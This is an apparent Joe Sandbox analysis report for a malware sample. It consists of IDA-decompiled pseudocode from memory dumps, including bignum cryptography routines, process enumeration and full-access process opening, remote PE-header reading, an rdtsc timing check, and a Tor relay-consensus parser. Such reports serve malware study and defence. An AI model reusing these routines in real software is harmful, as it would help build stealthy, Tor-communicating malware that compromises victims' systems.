    				_t342 = _t168 & 0x0000ffff;
    				_t169 = _t168 >> 0x10;
    				_t272 = _t342 * _t169;
    				_t225 = _t169 * _t169 + (_t272 >> 0xf);
    				_t273 = _t272 << 0x11;
    				_t174 = _t342 * _t342 + _t273;
    				if(_t174 < _t273) {
    					_t225 = _t225 + 1;
    				}
    				_t312 = _t311 + _t174;
    				if(_t312 < _t174) {
    					_t225 = _t225 + 1;
    				}
    				 *((intOrPtr*)(_t183 + 0x18)) = _t312;
    				 *((intOrPtr*)(_t183 + 0x1c)) = _t225 + _v12;
    				return _t174;
    			}


    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D69E7(intOrPtr* __ecx, unsigned int* __edx, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				unsigned int _t64;
    				signed int _t67;
    				signed int _t70;
    				intOrPtr _t71;
    				signed int _t72;
    				signed int _t73;
    				void* _t74;
    				void* _t75;
    				intOrPtr _t76;
    				signed int _t77;
    				signed int _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    				signed int _t82;
    				signed int _t83;
    				void* _t84;
    				void* _t85;
    				intOrPtr _t86;
    				signed int _t89;
    				signed int _t92;
    				intOrPtr _t93;
    				unsigned int* _t95;
    				void* _t96;
    				intOrPtr* _t97;
    				unsigned int _t100;
    				unsigned int _t104;
    				signed int _t105;
    				unsigned int _t106;
    				unsigned int _t110;
    				signed int _t111;
    				intOrPtr _t112;
    				intOrPtr _t113;
    				unsigned int _t114;
    				unsigned int _t118;
    				signed int _t119;
    				signed int _t120;
    				intOrPtr _t121;
    				unsigned int _t122;
    				unsigned int _t126;
    				signed int _t127;
    				intOrPtr _t128;
    				intOrPtr _t129;
    				unsigned int _t130;
    				unsigned int _t134;
    				signed int _t135;
    				signed int _t137;
    				signed int _t138;
    				intOrPtr _t139;
    				signed int _t141;
    				signed int _t145;
    				signed int _t149;
    				signed int _t153;
    				signed int _t154;
    				signed int _t155;
    				signed int _t158;
    				signed int _t159;
    				void* _t160;
    				void* _t161;
    				intOrPtr _t162;
    				signed int _t163;
    				signed int _t164;
    				signed int _t165;
    				signed int _t166;
    				signed int _t167;
    				intOrPtr _t168;
    				signed int _t169;
    				signed int _t170;
    				signed int _t171;
    				signed int _t173;
    				signed int _t174;
    				void* _t175;
    				void* _t176;
    				intOrPtr _t177;
    
    				_t97 = __ecx;
    				_v16 = _v16 & 0x00000000;
    				_t95 = __edx;
    				if(_a4 > 0) {
    					_v8 = _t64 & 0x0000ffff;
    					_v12 = _t64 >> 0x10;
    					while((_a4 & 0xfffffffc) != 0) {
    						_t100 =  *_t95;
    						_t158 = _t100 & 0x0000ffff;
    						_t137 = _t100 >> 0x10;
    						_t159 = _t158 * _v8;
    						_t138 = _t137 * _v12;
    						_t67 = _t137 * _v8;
    						_t104 = _t158 * _v12 + _t67;
    						if(_t104 < _t67) {
    							_t138 = _t138 + 0x10000;
    						}
    						_t105 = _t104 << 0x10;
    						_t160 = _t159 + _t105;
    						_t139 = _t138 + (_t104 >> 0x10);
    						if(_t160 < _t105) {
    							_t139 = _t139 + 1;
    						}
    						_t70 = _v16;
    						_t161 = _t160 + _t70;
    						_v20 = _t139;
    						if(_t161 < _t70) {
    							_v20 = _t139 + 1;
    						}
    						_t71 =  *_t97;
    						_t162 = _t161 + _t71;
    						if(_t162 < _t71) {
    							_v20 = _v20 + 1;
    						}
    						 *_t97 = _t162;
    						_t106 = _t95[1];
    						_t72 = _t106 & 0x0000ffff;
    						_t163 = _t106 >> 0x10;
    						_t73 = _t72 * _v8;
    						_t164 = _t163 * _v12;
    						_t141 = _t163 * _v8;
    						_t110 = _t72 * _v12 + _t141;
    						if(_t110 < _t141) {
    							_t164 = _t164 + 0x10000;
    						}
    						_t111 = _t110 << 0x10;
    						_t74 = _t73 + _t111;
    						_t165 = _t164 + (_t110 >> 0x10);
    						if(_t74 < _t111) {
    							_t165 = _t165 + 1;
    						}
    						_t112 = _v20;
    						_t75 = _t74 + _t112;
    						_v16 = _t165;
    						if(_t75 < _t112) {
    							_v16 = _t165 + 1;
    						}
    						_t113 =  *((intOrPtr*)(_t97 + 4));
    						_t76 = _t75 + _t113;
    						if(_t76 < _t113) {
    							_v16 = _v16 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 4)) = _t76;
    						_t114 = _t95[2];
    						_t77 = _t114 & 0x0000ffff;
    						_t166 = _t114 >> 0x10;
    						_t78 = _t77 * _v8;
    						_t167 = _t166 * _v12;
    						_t145 = _t166 * _v8;
    						_t118 = _t77 * _v12 + _t145;
    						if(_t118 < _t145) {
    							_t167 = _t167 + 0x10000;
    						}
    						_t119 = _t118 << 0x10;
    						_t79 = _t78 + _t119;
    						_t168 = _t167 + (_t118 >> 0x10);
    						if(_t79 < _t119) {
    							_t168 = _t168 + 1;
    						}
    						_t120 = _v16;
    						_t80 = _t79 + _t120;
    						_v20 = _t168;
    						if(_t80 < _t120) {
    							_v20 = _t168 + 1;
    						}
    						_t121 =  *((intOrPtr*)(_t97 + 8));
    						_t81 = _t80 + _t121;
    						if(_t81 < _t121) {
    							_v20 = _v20 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 8)) = _t81;
    						_t122 = _t95[3];
    						_t82 = _t122 & 0x0000ffff;
    						_t169 = _t122 >> 0x10;
    						_t83 = _t82 * _v8;
    						_t170 = _t169 * _v12;
    						_t149 = _t169 * _v8;
    						_t126 = _t82 * _v12 + _t149;
    						if(_t126 < _t149) {
    							_t170 = _t170 + 0x10000;
    						}
    						_t127 = _t126 << 0x10;
    						_t84 = _t83 + _t127;
    						_t171 = _t170 + (_t126 >> 0x10);
    						if(_t84 < _t127) {
    							_t171 = _t171 + 1;
    						}
    						_t128 = _v20;
    						_t85 = _t84 + _t128;
    						if(_t85 < _t128) {
    							_t171 = _t171 + 1;
    						}
    						_t129 =  *((intOrPtr*)(_t97 + 0xc));
    						_t86 = _t85 + _t129;
    						if(_t86 < _t129) {
    							_t171 = _t171 + 1;
    						}
    						 *((intOrPtr*)(_t97 + 0xc)) = _t86;
    						_t95 =  &(_t95[4]);
    						_t97 = _t97 + 0x10;
    						_a4 = _a4 - 4;
    						_v16 = _t171;
    					}
    					if(_a4 == 0) {
    						L48:
    						return _v16;
    					}
    					_t96 = _t95 - _t97;
    					do {
    						_t130 =  *(_t96 + _t97);
    						_t173 = _t130 & 0x0000ffff;
    						_t153 = _t130 >> 0x10;
    						_t174 = _t173 * _v8;
    						_t154 = _t153 * _v12;
    						_t89 = _t153 * _v8;
    						_t134 = _t173 * _v12 + _t89;
    						if(_t134 < _t89) {
    							_t154 = _t154 + 0x10000;
    						}
    						_t135 = _t134 << 0x10;
    						_t175 = _t174 + _t135;
    						_t155 = _t154 + (_t134 >> 0x10);
    						if(_t175 < _t135) {
    							_t155 = _t155 + 1;
    						}
    						_t92 = _v16;
    						_t176 = _t175 + _t92;
    						if(_t176 < _t92) {
    							_t155 = _t155 + 1;
    						}
    						_t93 =  *_t97;
    						_t177 = _t176 + _t93;
    						if(_t177 < _t93) {
    							_t155 = _t155 + 1;
    						}
    						 *_t97 = _t177;
    						_t97 = _t97 + 4;
    						_t60 =  &_a4;
    						 *_t60 = _a4 - 1;
    						_v16 = _t155;
    					} while ( *_t60 != 0);
    					goto L48;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003D6BFB(unsigned int* __ecx, intOrPtr* __edx, signed int _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				unsigned int _t55;
    				signed int _t58;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				void* _t64;
    				intOrPtr _t65;
    				signed int _t66;
    				signed int _t67;
    				void* _t68;
    				intOrPtr _t69;
    				signed int _t70;
    				signed int _t71;
    				void* _t72;
    				intOrPtr _t73;
    				signed int _t76;
    				signed int _t79;
    				intOrPtr* _t81;
    				void* _t82;
    				unsigned int _t85;
    				unsigned int _t89;
    				signed int _t90;
    				unsigned int _t91;
    				unsigned int _t95;
    				signed int _t96;
    				intOrPtr _t97;
    				unsigned int _t98;
    				unsigned int _t102;
    				signed int _t103;
    				signed int _t104;
    				unsigned int _t105;
    				unsigned int _t109;
    				signed int _t110;
    				intOrPtr _t111;
    				unsigned int _t112;
    				unsigned int _t116;
    				signed int _t117;
    				signed int _t119;
    				signed int _t120;
    				void* _t121;
    				intOrPtr _t122;
    				signed int _t123;
    				signed int _t124;
    				signed int _t125;
    				signed int _t126;
    				signed int _t127;
    				intOrPtr _t128;
    				signed int _t129;
    				signed int _t130;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				void* _t134;
    				intOrPtr _t135;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr _t141;
    				signed int _t143;
    				signed int _t147;
    				signed int _t151;
    				signed int _t155;
    				signed int _t156;
    				signed int _t157;
    				unsigned int* _t159;
    
    				_v16 = _v16 & 0x00000000;
    				_t159 = __ecx;
    				_t81 = __edx;
    				if(_a4 > 0) {
    					_v8 = _t55 & 0x0000ffff;
    					_v12 = _t55 >> 0x10;
    					while((_a4 & 0xfffffffc) != 0) {
    						_t85 =  *_t159;
    						_t119 = _t85 & 0x0000ffff;
    						_t139 = _t85 >> 0x10;
    						_t120 = _t119 * _v8;
    						_t140 = _t139 * _v12;
    						_t58 = _t139 * _v8;
    						_t89 = _t119 * _v12 + _t58;
    						if(_t89 < _t58) {
    							_t140 = _t140 + 0x10000;
    						}
    						_t90 = _t89 << 0x10;
    						_t121 = _t120 + _t90;
    						_t141 = _t140 + (_t89 >> 0x10);
    						if(_t121 < _t90) {
    							_t141 = _t141 + 1;
    						}
    						_t61 = _v16;
    						_t122 = _t121 + _t61;
    						_v20 = _t141;
    						if(_t122 < _t61) {
    							_v20 = _t141 + 1;
    						}
    						 *_t81 = _t122;
    						_t91 = _t159[1];
    						_t62 = _t91 & 0x0000ffff;
    						_t123 = _t91 >> 0x10;
    						_t63 = _t62 * _v8;
    						_t124 = _t123 * _v12;
    						_t143 = _t123 * _v8;
    						_t95 = _t62 * _v12 + _t143;
    						if(_t95 < _t143) {
    							_t124 = _t124 + 0x10000;
    						}
    						_t96 = _t95 << 0x10;
    						_t64 = _t63 + _t96;
    						_t125 = _t124 + (_t95 >> 0x10);
    						if(_t64 < _t96) {
    							_t125 = _t125 + 1;
    						}
    						_t97 = _v20;
    						_t65 = _t64 + _t97;
    						_v16 = _t125;
    						if(_t65 < _t97) {
    							_v16 = _t125 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 4)) = _t65;
    						_t98 = _t159[2];
    						_t66 = _t98 & 0x0000ffff;
    						_t126 = _t98 >> 0x10;
    						_t67 = _t66 * _v8;
    						_t127 = _t126 * _v12;
    						_t147 = _t126 * _v8;
    						_t102 = _t66 * _v12 + _t147;
    						if(_t102 < _t147) {
    							_t127 = _t127 + 0x10000;
    						}
    						_t103 = _t102 << 0x10;
    						_t68 = _t67 + _t103;
    						_t128 = _t127 + (_t102 >> 0x10);
    						if(_t68 < _t103) {
    							_t128 = _t128 + 1;
    						}
    						_t104 = _v16;
    						_t69 = _t68 + _t104;
    						_v20 = _t128;
    						if(_t69 < _t104) {
    							_v20 = _t128 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 8)) = _t69;
    						_t105 = _t159[3];
    						_t70 = _t105 & 0x0000ffff;
    						_t129 = _t105 >> 0x10;
    						_t71 = _t70 * _v8;
    						_t130 = _t129 * _v12;
    						_t151 = _t129 * _v8;
    						_t109 = _t70 * _v12 + _t151;
    						if(_t109 < _t151) {
    							_t130 = _t130 + 0x10000;
    						}
    						_t110 = _t109 << 0x10;
    						_t72 = _t71 + _t110;
    						_t131 = _t130 + (_t109 >> 0x10);
    						if(_t72 < _t110) {
    							_t131 = _t131 + 1;
    						}
    						_t111 = _v20;
    						_t73 = _t72 + _t111;
    						if(_t73 < _t111) {
    							_t131 = _t131 + 1;
    						}
    						 *((intOrPtr*)(_t81 + 0xc)) = _t73;
    						_t159 =  &(_t159[4]);
    						_t81 = _t81 + 0x10;
    						_a4 = _a4 - 4;
    						_v16 = _t131;
    					}
    					if(_a4 == 0) {
    						L38:
    						return _v16;
    					}
    					_t82 = _t81 - _t159;
    					do {
    						_t112 =  *_t159;
    						_t132 = _t112 & 0x0000ffff;
    						_t155 = _t112 >> 0x10;
    						_t133 = _t132 * _v8;
    						_t156 = _t155 * _v12;
    						_t76 = _t155 * _v8;
    						_t116 = _t132 * _v12 + _t76;
    						if(_t116 < _t76) {
    							_t156 = _t156 + 0x10000;
    						}
    						_t117 = _t116 << 0x10;
    						_t134 = _t133 + _t117;
    						_t157 = _t156 + (_t116 >> 0x10);
    						if(_t134 < _t117) {
    							_t157 = _t157 + 1;
    						}
    						_t79 = _v16;
    						_t135 = _t134 + _t79;
    						if(_t135 < _t79) {
    							_t157 = _t157 + 1;
    						}
    						 *((intOrPtr*)(_t82 + _t159)) = _t135;
    						_t159 =  &(_t159[1]);
    						_t51 =  &_a4;
    						 *_t51 = _a4 - 1;
    						_v16 = _t157;
    					} while ( *_t51 != 0);
    					goto L38;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 46%
    			E003CF720(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				intOrPtr _t34;
    				intOrPtr _t35;
    				intOrPtr _t42;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t62;
    				intOrPtr _t68;
    				intOrPtr _t71;
    				void* _t76;
    
    				_t55 =  *0x3e8628; // 0x622508
    				_push(0xf0000000);
    				_push(0x18);
    				_push(0);
    				_push(0);
    				_v16 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_push( &_v16);
    				_t76 = 0;
    				_t54 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x180))))() != 0) {
    					_push( &_v8);
    					_t42 =  *0x3e8628; // 0x622508
    					_push(0);
    					_push(0);
    					_push(_a20);
    					_push(_v16);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x16c))))() != 0) {
    						_push(0);
    						_push(_a8);
    						_t71 =  *0x3e8628; // 0x622508
    						_push(_a4);
    						_push(_v8);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x160))))() != 0) {
    							_push(0);
    							_push( &_v20);
    							_t62 =  *0x3e8628; // 0x622508
    							_push( &_v12);
    							_push(4);
    							_v20 = 4;
    							_push(_v8);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x184))))() != 0) {
    								_t76 = E003D1D90(_v12, 0);
    								if(_t76 != 0) {
    									_t51 =  *0x3e8628; // 0x622508
    									_push(0);
    									_push( &_v12);
    									_push(_t76);
    									_push(2);
    									_push(_v8);
    									if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x184))))() == 0) {
    										E003CBB40(_t76);
    									} else {
    										_t54 = 1;
    									}
    								}
    							}
    						}
    					}
    				}
    				_t34 = _v8;
    				if(_t34 != 0) {
    					_t68 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x164))))(_t34);
    				}
    				_t35 = _v16;
    				if(_t35 != 0) {
    					_t57 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x178))))(_t35, 0);
    				}
    				 *_a12 = _t76;
    				 *_a16 = _v12;
    				return _t54;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 81%
    			E003CF310(intOrPtr _a4, char _a8, signed short** _a12, signed short** _a16) {
    				intOrPtr _t16;
    				void* _t17;
    				signed short* _t23;
    				intOrPtr _t28;
    				signed short* _t32;
    				intOrPtr _t36;
    				signed int _t38;
    				char _t40;
    				signed short* _t42;
    
    				_t28 = _a4;
    				_t40 = _a8;
    				 *_a12 = 0;
    				 *_a16 = 0;
    				_t16 =  *0x3e8628; // 0x622508
    				_t17 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x1d0))))(_t28, _t40, 1, 0,  &_a8);
    				if(_t17 != 0) {
    					_t42 = E003D1D90(_a8 + _a8, 0);
    					if(_t42 == 0) {
    						L5:
    						return 0;
    					} else {
    						_t36 =  *0x3e8628; // 0x622508
    						_push( &_a8);
    						_push(_t42);
    						_push(0x80000001);
    						_push(_t40);
    						_push(_t28);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1d0))))() != 0) {
    							_t23 = _t42;
    							_t32 = _t42;
    							do {
    								if( *_t23 == 0xa) {
    									_t23 =  &(_t23[1]);
    								}
    								 *_t32 =  *_t23 & 0x0000ffff;
    								_t38 =  *_t23 & 0x0000ffff;
    								_t32 =  &(_t32[1]);
    								_t23 =  &(_t23[1]);
    							} while (_t38 != 0);
    							 *_a12 = _t42;
    							 *_a16 = _a8 + _a8;
    							return 1;
    						} else {
    							E003CBB40(_t42);
    							goto L5;
    						}
    					}
    				} else {
    					return _t17;
    				}
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 84%
    			E003C7850(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
    				char _v524;
    				intOrPtr _v552;
    				char _v560;
    				intOrPtr _t15;
    				intOrPtr _t18;
    				void* _t23;
    				intOrPtr _t25;
    				void* _t28;
    				intOrPtr _t32;
    				intOrPtr _t33;
    				intOrPtr _t36;
    				void* _t41;
    				void* _t42;
    
    				_t15 =  *0x3e8628; // 0x622508
    				_t41 = 0;
    				_t28 = __ecx;
    				_v560 = 0x22c;
    				_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x134))))(2, 0);
    				if(_t42 == 0xffffffff) {
    					L9:
    					return _t41;
    				}
    				_t18 =  *0x3e8628; // 0x622508
    				_push( &_v560);
    				_push(_t42);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x12c))))() != 1) {
    					L8:
    					_t36 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0xf8))))(_t42);
    					goto L9;
    				}
    				while(1) {
    					_t32 =  *0x3e8628; // 0x622508
    					_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 0xe0))))( &_v524, _a4);
    					_t33 =  *0x3e8628; // 0x622508
    					if(_t23 == 0) {
    						break;
    					}
    					_push( &_v560);
    					_push(_t42);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x130))))() == 1) {
    						continue;
    					}
    					goto L8;
    				}
    				_t25 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x68))))(0x1fffff, 0, _v552);
    				if(_t25 != 0) {
    					 *((intOrPtr*)(_t28 + 0x68)) = 0;
    					_t41 = 1;
    					 *_a8 = _t25;
    				}
    				goto L8;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003C6740(void* __ecx, intOrPtr _a4) {
    				intOrPtr _v12;
    				char _v20;
    				intOrPtr _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v108;
    				intOrPtr _v316;
    				char _v356;
    				intOrPtr _t27;
    
    				_t35 = _a4;
    				_push(0);
    				_push(0x18);
    				_push( &_v44);
    				_t27 =  *0x3e8628; // 0x622508
    				_push(0);
    				_push(_a4);
    				if( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1f0))))() < 0 || E003C6CD0(__ecx, _t35, _v40,  &_v20, 0x10) == 0 || E003C6CD0(__ecx, _t35, _v12,  &_v108, 0x40) == 0 || E003C6CD0(__ecx, _t35, _v48 + _v12,  &_v356, 0xf8) == 0) {
    					return 0;
    				} else {
    					return _v316 + _v12;
    				}
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003CF550(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
    				void* _t13;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t19;
    				intOrPtr _t27;
    				intOrPtr _t30;
    				void* _t34;
    				intOrPtr _t35;
    				void* _t38;
    				intOrPtr* _t39;
    
    				_t30 =  *0x3e8628; // 0x622508
    				_t35 = _a4;
    				_t39 = 0;
    				_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0x18))))(_t35, _a8, _a12, _t34, _t38, _t19, __ecx);
    				if(_t13 == 0) {
    					L4:
    					 *_a16 = _t39;
    					 *_a20 = 0;
    					return 0;
    				} else {
    					_t27 =  *0x3e8628; // 0x622508
    					_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x20))))(_t35, _t13);
    					if(_t15 == 0) {
    						goto L4;
    					} else {
    						_t16 =  *0x3e8628; // 0x622508
    						_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x38))))(_t15);
    						if(_t39 == 0) {
    							goto L4;
    						} else {
    							 *_a16 = _t39 + 4;
    							 *_a20 =  *_t39;
    							return 1;
    						}
    					}
    				}
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 68%
    			E003E1250(intOrPtr __eax, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    
    				asm("rdtsc");
    				_v12 = __eax;
    				_v8 = __edx;
    				return _v12;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003D4DC1(char* _a4) {
    				signed int _v8;
    				intOrPtr* _v12;
    				char* _v16;
    				char* _v20;
    				char* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _t53;
    				intOrPtr _t54;
    				intOrPtr _t55;
    				char* _t63;
    				intOrPtr _t69;
    				int _t70;
    				intOrPtr _t72;
    				intOrPtr _t73;
    				void* _t75;
    				int _t77;
    				intOrPtr* _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				char _t102;
    				intOrPtr _t104;
    				void* _t105;
    				char* _t107;
    				intOrPtr _t108;
    				void* _t109;
    				char* _t111;
    				void* _t112;
    				void* _t115;
    				void* _t116;
    
    				_v24 = 0;
    				_t53 =  *0x3e8538(0x80);
    				_v12 = _t53;
    				_t54 =  *0x3e8538(0x80);
    				_v32 = _t54;
    				_t55 =  *0x3e8538(0x80);
    				_t111 = "\n";
    				_v28 = _t55;
    				_v36 = 0;
    				_v16 = strtok(_a4, _t111);
    				_t107 = strtok(0, _t111);
    				_t116 = _t115 + 0x1c;
    				_v20 = _t107;
    				if(_t107 == 0) {
    					L24:
    					_t112 = 0;
    				} else {
    					_v8 = _v8 & 0x00000000;
    					L3:
    					while(1) {
    						if( *_t107 != 0x73 || _t107[1] != 0x20) {
    							L20:
    							_v36 = _v16;
    							_v16 = _t107;
    							_t63 = strtok(0, _t111);
    							_v20 = _t63;
    							if(_t63 != 0) {
    								_t107 = _v20;
    								continue;
    							} else {
    								_t80 = _v24;
    								if(_t80 == 0) {
    									goto L24;
    								} else {
    									 *0x3e8ac4 = _t80;
    									_t112 = 1;
    								}
    							}
    						} else {
    							if(strstr(_t107, "HSDir") == 0) {
    								if(strstr(_t107, "Valid") == 0 || strstr(_t107, "Running") == 0 || strstr(_t107, "Fast") == 0 || strstr(_t107, "Stable") == 0) {
    									goto L20;
    								} else {
    									_t69 =  *0x3e8ac0; // 0x0
    									 *((intOrPtr*)(_v8 + _t69 + 0x70)) = 1;
    									goto L12;
    								}
    							} else {
    								_t79 =  *0x3e8ac0; // 0x0
    								 *(_v8 + _t79 + 0x70) =  *(_v8 + _t79 + 0x70) & 0x00000000;
    								L12:
    								_push(_v28);
    								_t108 = _v12;
    								_push(_v32);
    								_push(_t108);
    								_t70 = sscanf(_v36, "%*[^ ] %*[^ ] %27[^ ] %*[^ ] %*[^ ] %15[^ ] %5s");
    								_t116 = _t116 + 0x14;
    								if(_t70 != 3) {
    									goto L24;
    								} else {
    									sprintf(_v8 +  *0x3e8ac0, "%s:%s", _v32, _v28);
    									_t116 = _t116 + 0x10;
    									_t109 = _t108 - 1;
    									do {
    										_t72 =  *((intOrPtr*)(_t109 + 1));
    										_t109 = _t109 + 1;
    									} while (_t72 != 0);
    									_t73 =  *0x3e8ac0; // 0x0
    									_t31 = _t73 + 0x18; // 0x18
    									_push(_v8 + _t31);
    									_push(_v12);
    									asm("movsw");
    									_t75 = 0x14;
    									asm("movsb");
    									if(E003D3933(_t75, _v8) != 0x14) {
    										goto L24;
    									} else {
    										_push(_v12);
    										_t77 = sscanf(_v16, "%*[^ ] %43[^ ]");
    										_t116 = _t116 + 0xc;
    										if(_t77 != 1) {
    											goto L24;
    										} else {
    											_t78 = _v12;
    											_t104 =  *0x3e8ac0; // 0x0
    											_t38 = _t104 + 0x2c; // 0x2c
    											_t105 = _v8 - _t78 + _t38;
    											do {
    												_t102 =  *_t78;
    												 *((char*)(_t105 + _t78)) = _t102;
    												_t78 = _t78 + 1;
    											} while (_t102 != 0);
    											_v24 = _v24 + 1;
    											_v8 = _v8 + 0x74;
    											_t107 = _v20;
    											_t111 = "\n";
    											goto L20;
    										}
    									}
    								}
    							}
    						}
    						goto L23;
    					}
    				}
    				L23:
    				 *0x3e8540(_v28);
    				 *0x3e8540(_v32);
    				 *0x3e8540(_v12);
    				return _t112;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
